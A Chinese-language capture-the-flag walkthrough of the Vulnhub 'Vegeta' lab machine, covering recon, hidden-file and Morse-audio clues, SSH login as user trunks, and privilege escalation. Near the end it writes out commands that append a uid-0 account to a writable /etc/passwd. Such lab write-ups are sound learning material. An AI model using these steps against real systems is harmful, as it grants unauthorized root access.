Vulnhub之Vegeta靶机详细测试过程
Vegeta
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/Vegeta]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:06 1 60 Unknown vendor
192.168.56.100 08:00:27:b2:b4:d3 1 60 PCS Systemtechnik GmbH
192.168.56.147 08:00:27:12:e1:97 1 60 PCS Systemtechnik GmbH
利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.147
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Vegeta]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.147 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-03 20:09 EST
Nmap scan report for bogon (192.168.56.147)
Host is up (0.00020s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 1f3130673f08302e6daee3209ebd6bba (RSA)
| 256 7d8855a86f56c805a47382dcd8db4759 (ECDSA)
|_ 256 ccdede4e84a891f51ad6d2a62e9e1ce0 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:12:E1:97 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.02 seconds
NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、80(http)
获得Shell
Kali Linux上利用浏览器访问80端口,返回页面含有图片,将其下载到Kali Linux本地:
┌──(kali㉿kali)-[~/Vulnhub/Vegeta]
└─$ ls
nmap_full_scan vegeta1.jpg
┌──(kali㉿kali)-[~/Vulnhub/Vegeta]
└─$
┌──(kali㉿kali)-[~/Vulnhub/Vegeta]
└─$ ls
nmap_full_scan vegeta1.jpg
┌──(kali㉿kali)-[~/Vulnhub/Vegeta]
└─$ steghide extract -sf vegeta1.jpg
Enter passphrase:
┌──(kali㉿kali)-[~/Vulnhub/Vegeta]
└─$ stegseek vegeta1.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Progress: 99.44% (132.7 MB)
[!] error: Could not find a valid passphrase.
┌──(kali㉿kali)-[~/Vulnhub/Vegeta]
└─$ exiftool vegeta1.jpg
ExifTool Version Number : 12.52
File Name : vegeta1.jpg
Directory : .
File Size : 46 kB
File Modification Date/Time : 2023:03:03 20:11:09-05:00
File Access Date/Time : 2023:03:03 20:12:26-05:00
File Inode Change Date/Time : 2023:03:03 20:11:09-05:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Image Width : 1500
Image Height : 844
Encoding Process : Progressive DCT, Huffman coding
Bits Per Sample : 8
Color Components : 1
Image Size : 1500x844
Megapixels : 1.3
┌──(kali㉿kali)-[~/Vulnhub/Vegeta]
└─$ binwalk -e vegeta1.jpg
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01
对图片的分析没有得到有价值的信息。
┌──(kali㉿kali)-[~/Vulnhub/Vegeta]
└─$ curl http://192.168.56.147/robots.txt
*
/find_me
┌──(kali㉿kali)-[~/Vulnhub/Vegeta]
└─$ curl http://192.168.56.147/find_me
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://192.168.56.147/find_me/">here</a>.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.147 Port 80</address>
</body></html>
┌──(kali㉿kali)-[~/Vulnhub/Vegeta]
└─$ curl http://192.168.56.147/find_me/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /find_me</title>
</head>
<body>
<h1>Index of /find_me</h1>
<table>
<tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
<tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td> </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="find_me.html">find_me.html</a></td><td align="right">2020-06-28 19:16 </td><td align="right">3.8K</td><td> </td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.147 Port 80</address>
</body></html>
┌──(kali㉿kali)-[~/Vulnhub/Vegeta]
└─$ curl http://192.168.56.147/find_me/find_me.html
<html>
<head> Vegeta-1.0 </head>
<body></body>
</html>
<!-- aVZCT1J3MEtHZ29BQUFBTlNVaEVVZ0FBQU1nQUFBRElDQVlBQUFDdFdLNmVBQUFIaGtsRVFWUjRuTzJad1k0c09RZ0U1LzkvK3UyMU5TdTdCd3JTaVN0QzhoR2M0SXBMOTg4L0FGanljem9BZ0RNSUFyQUJRUUEySUFqQUJnUUIySUFnQUJzUUJHQURnZ0JzUUJDQURRZ0NzQUZCQURhRUJmbjUrUmwvbk9aTFAxeER6K3g5VTA1cWJoWjFkcjRzSFQyejkwMDVxYmxaMU5uNXNuVDB6TjQzNWFUbVpsRm41OHZTMFRONzM1U1RtcHRGblowdlMwZlA3SDFUVG1wdUZuVjJ2aXdkUGJQM1RUbXB1Vm5VMmZteWRQVE0zamZscE9hdVhKUVRUamxkSHZ0YmxvNDZOUWp5UjV4eUlvZ09CUGtqVGprUlJBZUMvQkdubkFpaUEwSCtpRk5PQk5HQklIL0VLU2VDNkVDUVArS1VFMEYwakJWRS9aSGM4SEhkUHZ1RWQwZVF3N003MWFtelRIaDNCRGs4dTFPZE9zdUVkMGVRdzdNNzFhbXpUSGgzQkRrOHUxT2RPc3VFZDBlUXc3TTcxYW16VEhoM0JEazh1MU9kT3N1RWQwZVFJcWJNNENUcmhKMGhTQkZUWmtDUUdBaFN4SlFaRUNRR2doUXhaUVlFaVlFZ1JVeVpBVUZpSUVnUlUyWkFrQmdJVXNTVUdSQWtCb0lVMFRHZjAxN2UrdTRJVXNScEtSRGtXYzVsdjNEQlN4ZjFqZE5TSU1pem5NdCs0WUtYTHVvYnA2VkFrR2M1bC8zQ0JTOWQxRGRPUzRFZ3ozSXUrNFVMWHJxb2I1eVdBa0dlNVZ6MkN4ZThkRkhmT0MwRmdqekx1ZXdYTGhCL2VGazZjcm84Mm9rc2IzMTNCQkgwdkNITFc5OGRRUVE5YjhqeTFuZEhFRUhQRzdLODlkMFJSTkR6aGl4dmZYY0VFZlM4SWN0YjN4MUJCRDF2eVBMV2R5OFZaTXJwV1BDYjY2YWNEQWdTbUkrNjJTY0RnZ1RtbzI3MnlZQWdnZm1vbTMweUlFaGdQdXBtbnd3SUVwaVB1dGtuQTRJRTVxTnU5c25nOVNPMkFjcmxQN212SXd2OEg3YjVDd1NCVDlqbUx4QUVQbUdidjBBUStJUnQvZ0pCNEJPMitRc0VnVS9ZNWk4UUJENlIvUS9pMURPTFU4OHBkV3FxY3lKSTBlenFubFBxMUNBSWdveXFVNE1nQ0RLcVRnMkNJTWlvT2pVSWdpQ2o2dFFnQ0lLTXFsTnpYQkExYnhZeWk5TU1UbStVeWwvZXNSZ0VpZU0wZzlNYnBmS1hkeXdHUWVJNHplRDBScW44NVIyTFFaQTRUak00dlZFcWYzbkhZaEFranRNTVRtK1V5bC9lc1JnRWllTTBnOU1icGZLWGR5d0dRZUk0emVEMFJxbjhwYzJTUTcxWkFxZlpwd2pTVWJmc2w2cEtoRU1RajV3SUVzeWZxa3FFUXhDUG5BZ1N6SitxU29SREVJK2NDQkxNbjZwS2hFTVFqNXdJRXN5ZnFrcUVReENQbkFnU3pKK3FTb1JERUkrY0NCTE1uNm9xRHVleWpLNmVhcHdFNmNpWjdabkttS29xRHVleWpLNmVhaEFFUVI3VnFYdXFRUkFFZVZTbjdxa0dRUkRrVVoyNnB4b0VRWkJIZGVxZWFoQUVRUjdWcVh1cVFaQ0JncWcvNWpmZjEvRngzUzdXOHE2cHdia1BRUkNFK3hDa01HZnFycW5CdVE5QkVJVDdFS1F3WitxdXFjRzVEMEVRaFBzUXBEQm42cTdLY0ZtY0hzYnBvM1RLMlpGbEFnaHlPQXVDZUlNZ2g3TWdpRGNJY2pnTGduaURJSWV6SUlnM0NISTRDNEo0Z3lDSHN5Q0lONldDM1A0d1RvL3RKTEo2TDhvc0NGSjBueG9FUVpDMkxCMzNxVUVRQkduTDBuR2ZHZ1JCa0xZc0hmZXBRUkFFYWN2U2NaOGFCRUdRdGl3ZDk2bEJrSUdDZE5TcGUyYnZVMzk0Nm5mb3lPazAzN0pmdU1Ba2VGZlA3SDFPSDE3MlBuVk9wL21XL2NJRkpzRzdlbWJ2Yy9yd3N2ZXBjenJOdCt3WExqQUozdFV6ZTUvVGg1ZTlUNTNUYWI1bHYzQ0JTZkN1bnRuN25ENjg3SDNxbkU3ekxmdUZDMHlDZC9YTTN1ZjA0V1h2VStkMG1tL1pMMXhnRXJ5clovWStwdzh2ZTU4NnA5Tjh5MzdoQXZHSGZzUHlPN0pNMmFkNlp3aGkrbWdkODkyd1R3UzU3RUU3WmtjUUJMbm1RVHRtUnhBRXVlWkJPMlpIRUFTNTVrRTdaa2NRQkxubVFUdG1SNUFYQ1hJNzZnKzJBN1dRSFZrNnhFcmxUMVZkRElKNFpFRVFVeERFSXd1Q21JSWdIbGtReEJRRThjaUNJS1lnaUVjV0JERUZRVHl5akJXa1kyRDFjV0xLQitUeXdYNERRUkFFUVlUM0ljaGhFS1FXQkVFUUJCSGVoeUNIUVpCYUVBUkJFRVI0SDRJY0JrRnFzUmJFaVk2Y04zek1UaCtzK28xUy9VNEg2QUpCRUFSQk5pQUlnaURJQmdSQkVBVFpnQ0FJZ2lBYkVBUkJFR1FEZ2lESUtFRnUrTGc2NW5QSzRuVFV1MTdlRlM0d2VqUjF6bzc1bkxJNEhmV3VsM2VGQzR3ZVRaMnpZejZuTEU1SHZldmxYZUVDbzBkVDUreVl6eW1MMDFIdmVubFh1TURvMGRRNU8rWnp5dUowMUx0ZTNoVXVNSG8wZGM2TytaeXlPQjMxcnBkM2hRdU1IazJkczJNK3B5eE9SNzNyNVYzaEFxTkhVK2QwMnN1VUxOTnpJb2h4M1ExWnB1ZEVFT082RzdKTXo0a2d4blUzWkptZUUwR002MjdJTWowbmdoalgzWkJsZWs0RU1hNjdJY3YwbkFoU3hKUVoxRDJuZkMvTEhKWExjQm9ZUVR4NlR2bGVsamtxbCtFME1JSjQ5Snp5dlN4elZDN0RhV0FFOGVnNTVYdFo1cWhjaHRQQUNPTFJjOHIzc3N4UnVReW5nUkhFbytlVTcyV1pvM0laVGdNamlFZlBLZC9MTWtmbE1weVk4bEVxSC9zSlRoODZnaFNBSUxVZ1NQT2kxQ0JJTFFqU3ZDZzFDRklMZ2pRdlNnMkMxSUlnell0U2d5QzFJRWp6b3RRZ1NDMElVckNvS1NjN245TmVzcHplZmNVTTJmbFMvU29EVERrZEMzYWF3U2tuZ2d3OEhRdDJtc0VwSjRJTVBCMExkcHJCS1NlQ0REd2RDM2Fhd1NrbmdndzhIUXQybXNFcEo0SU1QQjBMZHByQktlZnJCQUY0RXdnQ3NBRkJBRFlnQ01BR0JBSFlnQ0FBR3hBRVlBT0NBR3hBRUlBTkNBS3dBVUVBTmlBSXdBWUVBZGp3SHlVRnd2VnIwS3ZGQUFBQUFFbEZUa1N1UW1DQw== -->
返回页面含有经过编码的注释,需要将其Base64解码,但是解码后得到的信息似乎仍然是经过编码的,其实还是另外一层base64编码,解码后可知是图片,发现是一个二维码:
扫码后为:
Password: topshellv
┌──(kali㉿kali)-[~/Vulnhub/Vegeta]
└─$ file dehash
dehash: PNG image data, 200 x 200, 8-bit/color RGBA, non-interlaced
──(kali㉿kali)-[~/Vulnhub/Vegeta]
└─$ nikto -h http://192.168.56.147
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.147
+ Target Hostname: 192.168.56.147
+ Target Port: 80
+ Start Time: 2023-03-03 20:43:14 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 77, size: 5a9262e9632c0, mtime: gzip
+ Allowed HTTP Methods: HEAD, GET, POST, OPTIONS
+ OSVDB-3268: /admin/: Directory indexing found.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3268: /image/: Directory indexing found.
+ OSVDB-9624: /admin/admin.php?adminpy=1: PY-Membres 4.2 may allow administrator access.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 7915 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time: 2023-03-03 20:43:31 (GMT-5) (17 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
虽然nikto工具发现了/admin/目录以及/login.php但是似乎都不能正常显示。
虽然前面从二维码图片知道了密码,但是并不知道是什么服务什么用户的密码。
──(kali㉿kali)-[~/Vulnhub/Vegeta]
└─$ gobuster dir -u http://192.168.56.147 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.147
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: html,txt,sh,php
[+] Timeout: 10s
===============================================================
2023/03/03 21:26:07 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 119]
/img (Status: 301) [Size: 314] [--> http://192.168.56.147/img/]
/login.php (Status: 200) [Size: 0]
/image (Status: 301) [Size: 316] [--> http://192.168.56.147/image/]
/admin (Status: 301) [Size: 316] [--> http://192.168.56.147/admin/]
/manual (Status: 301) [Size: 317] [--> http://192.168.56.147/manual/]
/robots.txt (Status: 200) [Size: 11]
/.html (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
/bulma (Status: 301) [Size: 316] [--> http://192.168.56.147/bulma/]
/logitech-quickcam_W0QQcatrefZC5QQfbdZ1QQfclZ3QQfposZ95112QQfromZR14QQfrppZ50QQfsclZ1QQfsooZ1QQfsopZ1QQfssZ0QQfstypeZ1QQftrtZ1QQftrvZ1QQftsZ2QQnojsprZyQQpfidZ0QQsaatcZ1QQsacatZQ2d1QQsacqyopZgeQQsacurZ0QQsadisZ200QQsaslopZ1QQsofocusZbsQQsorefinesearchZ1.html (Status: 403) [Size: 279]
Progress: 6367997 / 6369170 (99.98%)======================================================
换了不同的字典,终于扫描出/bulma目录。访问该文件,为一WAV文件,将其下载到Kali Linux:
┌──(kali㉿kali)-[~/Vulnhub/Vegeta]
└─$ mv ~/Downloads/hahahaha.wav .
┌──(kali㉿kali)-[~/Vulnhub/Vegeta]
└─$ ls
con dehash hahahaha.wav nmap_full_scan vegeta1.jpg
利用在线网站解码音频文件(摩斯编码),将hahaha.wav上传网站
https://morsecode.world/international/decoder/audio-decoder-expert.html
最终得到用户名:trunks,密码:u$3r(摩斯密码对于英文字符,不区分大小写,用户名和密码是尝试后得知的)
┌──(kali㉿kali)-[~/Vulnhub/Vegeta]
└─$ ssh trunks@192.168.56.147
The authenticity of host '192.168.56.147 (192.168.56.147)' can't be established.
ED25519 key fingerprint is SHA256:rsXPQiqA/9/evxX6rCmmUEw19kPNCvB8JB0r8rYuXR4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.147' (ED25519) to the list of known hosts.
trunks@192.168.56.147's password:
Linux Vegeta 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Jun 28 21:16:00 2020 from 192.168.43.72
trunks@Vegeta:~$ id
uid=1000(trunks) gid=1000(trunks) groups=1000(trunks),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
trunks@Vegeta:~$ sudo -l
-bash: sudo: command not found
trunks@Vegeta:~$ ls -alh
total 28K
drwxr-xr-x 3 trunks trunks 4.0K Jun 28 2020 .
drwxr-xr-x 3 root root 4.0K Jun 28 2020 ..
-rw------- 1 trunks trunks 382 Jun 28 2020 .bash_history
-rw-r--r-- 1 trunks trunks 220 Jun 28 2020 .bash_logout
-rw-r--r-- 1 trunks trunks 3.5K Jun 28 2020 .bashrc
drwxr-xr-x 3 trunks trunks 4.0K Jun 28 2020 .local
-rw-r--r-- 1 trunks trunks 807 Jun 28 2020 .profile
trunks@Vegeta:~$ cat .bash_history
perl -le ‘print crypt(“Password@973″,”addedsalt”)’
perl -le 'print crypt("Password@973","addedsalt")'
echo "Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd[/sh]
echo "Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd
ls
su Tom
ls -la
cat .bash_history
sudo apt-get install vim
apt-get install vim
su root
cat .bash_history
exit
trunks@Vegeta:~$
提权
将linpeas.sh脚本上传至目标主机/tmp目录,修改权限,并执行该脚本,从执行结果(部分)可知:
╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d
═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ /etc/passwd is writable
═╣ Credentials in fstab/mtab? ........... No
可创建密码,然后将密码以及用户名信息写入/etc/passwd文件中去:
trunks@Vegeta:/tmp$ echo 'rjason:$6$jason$h5DlgYsVif/enQPTm/CgJ54tpQaPz0fwOmjoJKkTXi.EZ4Z6IOesX4REn/Dq8mXA4povr6tGXPy16EAcN.Ln41:0:0:root:/root:/bin/bash' >> /etc/passwd
trunks@Vegeta:/tmp$ su - jason
su: user jason does not exist
trunks@Vegeta:/tmp$ su - rjason
Password:
root@Vegeta:~# cd /root
root@Vegeta:~# ls -alh
total 32K
drwx------ 3 root root 4.0K Jun 28 2020 .
drwxr-xr-x 18 root root 4.0K Jun 28 2020 ..
-rw------- 1 root root 186 Jun 28 2020 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 3 root root 4.0K Jun 28 2020 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 1.4K Jun 28 2020 root.txt
-rw------- 1 root root 1.8K Jun 28 2020 .viminfo
root@Vegeta:~# cat root.txt
, ,'|
,/|.-' \.
.-' ' |.
, .-' |
/|,' |'
/ ' | ,
/ ,'/
. | _ /
\`' .-. ,' `. |
\ / \ / \ /
\| V | | ,
( ) /.--. ''"/
"b.`. ,' _.ee'' 6)| ,-'
\"= --"" ) ' /.-'
\ / `---" ."|'
V E G I I T A \"..- .' |.
`-__..-',' |
_.) ' .-'/ /\.
.--'/----..--------. _.-""-.
.-') \. / _..-' _.-'--.
/ -'/ """"""""" ,'-. . `.
| ' / / ` `. \
| | | | |
\ .'\ | \ |
/ ' | ,' . - \`. | / /
/ / | | `/"--. -' /\
| | \ \ / \ |
| \ | \ .-| | |
Hurray you got root
Share your screenshot in telegram : https://t.me/joinchat/MnPu-h3Jg4CrUSCXJpegNw
root@Vegeta:~#
经验教训
-
Base64解码后得到的信息可能仍然是base64编码,并且如果原始文件是图片,那么此时可能看起来是乱码,因此最好二次解码后输出为文件,用file命令查看一下文件内容
-
本靶机中的二维码中的密码其实是rabbithole,关键在于扫描出目录,并对声音文件进行分析,这次用到的字典是:/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt